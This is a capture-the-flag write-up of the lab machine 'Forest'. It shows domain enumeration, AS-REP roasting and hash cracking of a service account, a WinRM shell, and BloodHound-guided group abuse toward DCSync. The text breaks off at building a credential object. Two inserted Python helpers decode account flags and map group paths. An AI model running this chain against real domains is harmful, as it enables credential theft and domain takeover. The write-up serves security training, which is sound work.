Forest
Ports scan
u505@kali:~/HTB/Machines/Forest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.161
Starting masscan 1.0.5 at 2020-04-04 03:15:26 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 50266/udp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 63775/udp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 49706/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 49157/udp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 49667/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 49670/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 65342/udp on 10.10.10.161
Masscan detects the WinRM port (5985/tcp) open. This port is not in the list of ports nmap scans by default.
u505@kali:~/HTB/Machines/Forest$ nmap -sC -sV 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 23:16 EDT
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.061s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-04 03:26:55Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m36s, deviation: 4h02m31s, median: 10m34s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-04-03T20:29:19-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-04-04T03:29:20
|_  start_date: 2020-04-04T03:23:27

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 288.23 seconds
Domain Enumeration
smbclient
u505@kali:~/HTB/Machines/Forest$ smbclient -L \\10.10.10.161
Enter WORKGROUP\u505's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
No information from smbclient in anonymous mode.
Nullinux
I didn't include the full output, but we enumerate users.
u505@kali:~/HTB/Machines/Forest$ python /opt/utils/nullinux/nullinux.py 10.10.10.161
...
u505@kali:~/HTB/Machines/Forest$ cat ./nullinux_users.txt
$331000-VK4ADACQNUCA
Administrator
andy
DefaultAccount
Guest
HealthMailbox0659cc1
HealthMailbox670628e
HealthMailbox6ded678
HealthMailbox7108a4e
HealthMailbox83d6781
HealthMailbox968e74d
HealthMailboxb01ac64
HealthMailboxc0a90c9
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxfd87238
krbtgt
lucinda
mark
santi
sebastien
SM_1b41c9286325456bb
SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb
SM_681f53d4942840e18
SM_75a538d3025e4db9a
SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549
SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b
svc-alfresco
EXCH01$
FOREST$
$D31000-NSEL5BRJ63V7
Exchange Servers
Exchange Trusted Subsystem
Service Accounts
Nmap doesn't find shares.
u505@kali:~/HTB/Machines/Forest$ nmap -p 445 --script=smb-enum-shares 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 23:29 EDT
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.28s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\10.10.10.161\ADMIN$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.10.161\C$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.10.161\IPC$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: READ
|   \\10.10.10.161\NETLOGON:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: <none>

Nmap done: 1 IP address (1 host up) scanned in 237.24 seconds
Enum4linux
I didn't paste the full output.
u505@kali:~/HTB/Machines/Forest$ enum4linux 10.10.10.161
...
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share

[+] Trying protocol 139/SMB...

    [!] Protocol failed: Cannot request session (Called Name:10.10.10.161)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

    [+] HTB
    [+] Builtin

[+] Password Info for Domain: HTB

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
The account lockout threshold is set to None, which means that password guessing against the users will not lock any account.
Impacket GetADUsers
Perhaps the fastest way to list the users.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetADUsers.py -all -dc-ip 10.10.10.161 HTB.local/
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

[*] Querying 10.10.10.161 for information about domain.
Name                  Email                                                                     PasswordLastSet             LastLogon
--------------------  ------------------------------------------------------------------------  --------------------------  --------------------------
Administrator         Administrator@htb.local                                                   2019-09-18 13:09:08.342879  2019-10-07 06:57:07.299606
Guest                                                                                           <never>                     <never>
DefaultAccount                                                                                  <never>                     <never>
krbtgt                                                                                          2019-09-18 06:53:23.467452  <never>
$331000-VK4ADACQNUCA                                                                            <never>                     <never>
SM_2c8eef0a09b545acb  SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local             <never>                     <never>
SM_ca8c2ed5bdab4dc9b  SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local             <never>                     <never>
SM_75a538d3025e4db9a  SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local             <never>                     <never>
SM_681f53d4942840e18  DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local    <never>                     <never>
SM_1b41c9286325456bb  Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local                  <never>                     <never>
SM_9b69f1b9d2cc45549  FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local             <never>                     <never>
SM_7c96b981967141ebb  SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local             <never>                     <never>
SM_c75ee099d0a64c91b  SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local             <never>                     <never>
SM_1ffab36a2f5f479cb  SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local             <never>                     <never>
HealthMailboxc3d7722  HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local                   2019-09-23 18:51:31.892097  2019-09-23 18:57:12.361516
HealthMailboxfc9daad  HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local                   2019-09-23 18:51:35.267114  2019-09-23 18:52:05.736012
HealthMailboxc0a90c9  HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local                   2019-09-19 07:56:35.206329  <never>
HealthMailbox670628e  HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local                   2019-09-19 07:56:45.643993  <never>
HealthMailbox968e74d  HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local                   2019-09-19 07:56:56.143969  <never>
HealthMailbox6ded678  HealthMailbox6ded67848a234577a1756e072081d01f@htb.local                   2019-09-19 07:57:06.597012  <never>
HealthMailbox83d6781  HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local                   2019-09-19 07:57:17.065809  <never>
HealthMailboxfd87238  HealthMailboxfd87238e536e49e08738480d300e3772@htb.local                   2019-09-19 07:57:27.487679  <never>
HealthMailboxb01ac64  HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local                   2019-09-19 07:57:37.878559  <never>
HealthMailbox7108a4e  HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local                   2019-09-19 07:57:48.253341  <never>
HealthMailbox0659cc1  HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local                   2019-09-19 07:57:58.643994  <never>
sebastien                                                                                       2019-09-19 20:29:59.544725  2019-09-22 18:29:29.586227
lucinda                                                                                         2019-09-19 20:44:13.233891  <never>
svc-alfresco                                                                                    2020-04-04 00:38:27.636686  2019-09-23 07:09:47.931194
andy                                                                                            2019-09-22 18:44:16.291082  <never>
mark                                                                                            2019-09-20 18:57:30.243568  <never>
santi                                                                                           2019-09-20 19:02:55.134828  <never>
Ldap browsing
With JXplorer we can browse the AD structure. Because we are not authenticated we only see some entries, but that is enough to enumerate users.
ASREPRoast
The script GetNPUsers.py from Impacket queries the target domain for users with 'Do not require Kerberos preauthentication' set and exports their TGTs for cracking.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 HTB.local/
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2020-04-04 00:44:13.449814  2019-09-23 07:09:47.931194  0x410200
The user svc-alfresco has the "Do not require Kerberos preauthentication" set.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -request HTB.local/
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2020-04-04 00:46:07.497215  2019-09-23 07:09:47.931194  0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d0432c58661d960a39f33c2b604d2d3e$508588cf6c2eaa5e63d3edf3a434131873f7f7e18a481d6cae77434e3dc59a3d5f8bcf3e8adecc5a8431295168863967e367fe3718352ab37012d09b1fa11cdaf350ea05b5e4297bc847b17e805df6427caf080f124df31d55c0838b1b684838a286f1ab450b2d78aa569494500136bcdd78ff521036e55f14cb0b952fe94f3dd67d932a14ab6b380529cf606a940e04f92302a1f432815f3c061f861d328f1131df41ae80e921569513f87ecc85b868c71884a1bd674d860a0872133d6016dbf87cba9de50db62b306890da0de6ab5db9120853e28f43153f83822f2076794eacdc84fc787c
If we request a ticket, the script extracts the hash.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -request HTB.local/ -outputfile NPuser.hash
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2020-04-04 00:48:00.778369  2020-04-04 00:47:13.028523  0x410200
We request a ticket and write the output to a file to pass it to hashcat.
u505@kali:~/HTB/Machines/Forest$ hashcat --help | grep Kerberos
7500 | Kerberos 5 AS-REQ Pre-Auth etype 23 | Network Protocols
13100 | Kerberos 5 TGS-REP etype 23 | Network Protocols
18200 | Kerberos 5 AS-REP etype 23 | Network Protocols
The mode is 18200.
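As an added audit example (not from the original write-up), the following Python decodes the UAC column that GetNPUsers.py printed for svc-alfresco (0x410200) into its userAccountControl flags, lists which accounts have pre-authentication disabled, and checks that a $krb5asrep$ line has the layout that hashcat mode 18200 expects. Only svc-alfresco's UAC value comes from the output above; the rows for sebastien and lucinda and the truncated sample line are constructed.

```python
import re

# userAccountControl bit flags (a subset of the values Microsoft documents).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000

# hashcat mode per Kerberos encryption type for AS-REP material.
# Only etype 23 (RC4-HMAC) appears in the write-up; other etypes are left unmapped.
HASHCAT_ASREP_MODES = {23: 18200}

# Layout of the line GetNPUsers.py -request prints:
#   $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum, hex>$<encrypted part, hex>
ASREP_LINE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def decode_uac(value):
    """Return the names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def accounts_without_preauth(rows):
    """Audit helper: from (sAMAccountName, userAccountControl) pairs, return the
    accounts whose DONT_REQ_PREAUTH bit is set, i.e. those exposed to AS-REP roasting."""
    return [name for name, uac in rows if uac & DONT_REQ_PREAUTH]


def parse_asrep_line(line):
    """Split a $krb5asrep$ line into its fields and pick the matching hashcat mode.
    Returns None when the line does not have the expected layout."""
    m = ASREP_LINE.match(line.strip())
    if m is None:
        return None
    etype = int(m.group("etype"))
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "etype": etype,
        "checksum": m.group("checksum").lower(),
        "edata_len": len(m.group("edata")) // 2,  # bytes of the encrypted AS-REP part
        "hashcat_mode": HASHCAT_ASREP_MODES.get(etype),
    }


# Constructed sample rows: svc-alfresco's value is the one GetNPUsers.py printed,
# the other two are made up for contrast.
SAMPLE_ROWS = [
    ("svc-alfresco", 0x410200),
    ("sebastien", 0x10200),  # constructed: password never expires, pre-auth required
    ("lucinda", 0x200),      # constructed: plain enabled account
]

# Constructed sample line: prefix and checksum are from the write-up, the
# encrypted part is truncated to 16 bytes to keep the example short.
SAMPLE_LINE = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:"
    "d0432c58661d960a39f33c2b604d2d3e$508588cf6c2eaa5e63d3edf3a4341318"
)

if __name__ == "__main__":
    for name, uac in SAMPLE_ROWS:
        print(f"{name:<14} {uac:#08x} {decode_uac(uac)}")
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ROWS))
    print(parse_asrep_line(SAMPLE_LINE))
```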
u505@kali:~/HTB/Machines/Forest$ hashcat -m 18200 NPuser.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU

OpenCL Platform #2: The pocl project
====================================
* Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.c6dafc9b.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5asrep$23$svc-alfresco@HTB.LOCAL:d6c4eec7a0867035ce3311b9c97e827c$4d98cdce450c8d4a0211655b226cce3d3ac88d9d57d1ff8da8708cda4916f3615344039074fb188fbabfc06a33f976b8adf3d98a65fd98fa4df87e351083c5bb57b8c7855bd826a487e9295024744a020eee3dd16426b4dafdb33817197fa8665880c52bafa16a0889177f2c8ed8199cdc7e4302314fc30f62150201135da7b5d7d23a7296386053a4b368981e41556bb2851bc79dd22097c09a73652455cd1dba3d4623c21e062c8f5d13f24be5874db33a623fc96ec794a94f573a7ac67cbf811ee6e92af262fb0ae6bc2addfe06cc74a41453dfb1c7861a14af977fc3be7e1be352dd0bc5:s3rvice

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:d6c4eec7a08670...dd0bc5
Time.Started.....: Sat Apr  4 00:41:20 2020 (2 secs)
Time.Estimated...: Sat Apr  4 00:41:22 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3251.5 kH/s (10.86ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4096000/14344384 (28.55%)
Rejected.........: 0/4096000 (0.00%)
Restore.Point....: 4014080/14344384 (27.98%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: sand3y -> s/n/o/o/p/y/
Hardware.Mon.#1..: Temp: 44c Util: 39% Core:1032MHz Mem:2505MHz Bus:16

Started: Sat Apr  4 00:41:13 2020
Stopped: Sat Apr  4 00:41:22 2020
Hashcat cracks the svc-alfresco user password.
svc-alfresco@HTB.LOCAL s3rvice
User Flag
With svc-alfresco's credentials we can bind to the AD LDAP with enhanced visibility, which allows us to enumerate groups.
svc-alfresco is a member of the Service Accounts group.
The group Service Accounts is a member of the group Privileged IT Accounts, and that group is a member of the group Remote Management Users. That means svc-alfresco should be able to execute Windows Remote Management (WinRM) commands, and we saw from masscan that the WinRM port (5985/tcp) was accessible.
u505@kali:~/HTB/Machines/Forest$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
<USER_FLAG>
Elevation of privileges
WinPEAS
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload winPEAS.exe
Info: Uploading winPEAS.exe to C:\Users\svc-alfresco\Documents\winPEAS.exe

Data: 321536 bytes of 321536 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> .\winPEAS.exe
I ran WinPEAS, but I didn't find useful information.
Bloodhound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.
Turn on the neo4j database
We start the graph database.
u505@kali:~$ sudo neo4j console
Active database: graph.db
Directories in use:
  home:         /usr/share/neo4j
  config:       /usr/share/neo4j/conf
  logs:         /usr/share/neo4j/logs
  plugins:      /usr/share/neo4j/plugins
  import:       /usr/share/neo4j/import
  data:         /usr/share/neo4j/data
  certificates: /usr/share/neo4j/certificates
  run:          /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2020-04-04 23:18:25.463+0000 INFO  ======== Neo4j 3.5.3 ========
2020-04-04 23:18:25.470+0000 INFO  Starting...
2020-04-04 23:18:27.001+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2020-04-04 23:18:28.157+0000 INFO  Started.
2020-04-04 23:18:28.885+0000 INFO  Remote interface available at http://localhost:7474/
Log in with the default credentials (neo4j/neo4j).
Password changed.
Start Bloodhound
u505@kali:/opt/utils/BloodHound/BloodHound-linux-x64$ ./BloodHound
Gather information with Sharphound
Sharphound collects data to feed the graph utility.
u505@kali:~/HTB/Machines/Forest$ cp /opt/utils/BloodHound/Ingestors/SharpHound.exe ./
From the target:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe

Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe --CollectionMethod all --Domain htb.local --ldapusername svc-alfresco --ldappassword s3rvice
----------------------------------------------
Initializing SharpHound at 7:51 PM on 4/5/2020
----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 21 MB RAM
Status: 123 objects finished (+123 61.5)/s -- Using 28 MB RAM
Enumeration finished in 00:00:02.4856263
Compressing data to .\20200404173254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:51 PM on 4/5/2020! Happy Graphing!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

    Directory: C:\Users\svc-alfresco\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020   5:32 PM          15124 20200404173254_BloodHound.zip
-a----         4/4/2020   5:32 PM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         4/4/2020   5:28 PM         832512 SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20200404173254_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20200404173254_BloodHound.zip to 20200404173254_BloodHound.zip

Info: Download successful!
Graph path to Domain admins
The generated file is processed by Bloodhound.
We search for the path to own the Domain Admins group.
BloodHound proposes:
- The user svc-alfresco is a member of the group Account Operators -> the members of the group ACCOUNT OPERATORS@HTB.LOCAL have GenericAll privileges over the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL.
- The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permission to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL -> with WriteDacl on a domain object, one can grant oneself the DCSync privileges.
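The nested memberships in the User Flag section and the path BloodHound proposes here are the same kind of graph query. As an added example (not from the original write-up, and not BloodHound's own code), this Python encodes exactly the relationships the write-up lists, resolves the transitive group membership of svc-alfresco, and runs the breadth-first search that finds which principals can reach the domain object. Edge names follow BloodHound's labels; the graph contains nothing the write-up does not state.

```python
from collections import deque

# Edge names as BloodHound labels them.
MEMBER_OF, GENERIC_ALL, WRITE_DACL = "MemberOf", "GenericAll", "WriteDacl"

# The relationships the write-up lists, as (source, edge, target).
FOREST_EDGES = [
    ("svc-alfresco", MEMBER_OF, "Service Accounts"),
    ("Service Accounts", MEMBER_OF, "Privileged IT Accounts"),
    ("Privileged IT Accounts", MEMBER_OF, "Remote Management Users"),
    ("svc-alfresco", MEMBER_OF, "Account Operators"),
    ("Account Operators", GENERIC_ALL, "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", WRITE_DACL, "HTB.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> list of (edge type, target). Every node gets an entry."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
        graph.setdefault(dst, [])
    return graph


def effective_groups(graph, principal):
    """Every group the principal belongs to, following nested MemberOf edges only."""
    seen, queue = set(), deque([principal])
    while queue:
        node = queue.popleft()
        for kind, dst in graph.get(node, []):
            if kind == MEMBER_OF and dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen


def shortest_path(graph, start, target):
    """BFS over all edge types. Returns [(src, edge, dst), ...] or None if unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for kind, dst in graph.get(node, []):
            if dst not in prev:
                prev[dst] = (node, kind)
                queue.append(dst)
    if target not in prev:
        return None
    path, node = [], target
    while prev[node] is not None:
        src, kind = prev[node]
        path.append((src, kind, node))
        node = src
    return path[::-1]


def render(path):
    """Print a path the way BloodHound's UI reads it: A -[edge]-> B -[edge]-> C."""
    out = path[0][0]
    for _, kind, dst in path:
        out += f" -[{kind}]-> {dst}"
    return out


def principals_reaching(graph, target):
    """Audit view: every node from which the target object is reachable."""
    return sorted(n for n in graph if n != target and shortest_path(graph, n, target))


if __name__ == "__main__":
    g = build_graph(FOREST_EDGES)
    print("svc-alfresco is effectively in:", sorted(effective_groups(g, "svc-alfresco")))
    print(render(shortest_path(g, "svc-alfresco", "HTB.LOCAL")))
    print("can reach the domain object:", principals_reaching(g, "HTB.LOCAL"))
```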
User member of group EXCHANGE WINDOWS PERMISSIONS
We create our own user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user /add u505 <PASS>
The command completed successfully.
Adding the user to the Domain Admins group triggers an Access denied.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /add "Domain Admins" u505
net.exe : System error 5 has occurred.
    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Access is denied.
From the Microsoft documentation (https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators):
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
We add our user to the Exchange Windows Permissions group.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /add "Exchange Windows Permissions" u505
The command completed successfully.
And to Remote Management Users, to be able to use Evil-WinRM with this user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" /add u505
The command completed successfully.
We check our new user.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user u505
User name                    u505
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/5/2020 8:48:45 PM
Password expires             5/17/2020 8:48:45 PM
Password changeable          4/6/2020 8:48:45 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Exchange Windows Perm*Domain Users
The command completed successfully.
WriteDacl DCSync privilege
Log in with our user.
u505@kali:~/HTB/Machines/Forest$ evil-winrm -i 10.10.10.161 -u u505 -p <PASS>
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
As the BloodHound abuse tab indicates, we create a credential object for our user.
*Evil-WinRM* PS C:\Users\u505\Documents> $SecPassword = ConvertTo-SecureString '<PASS>' -AsPlainText -Force
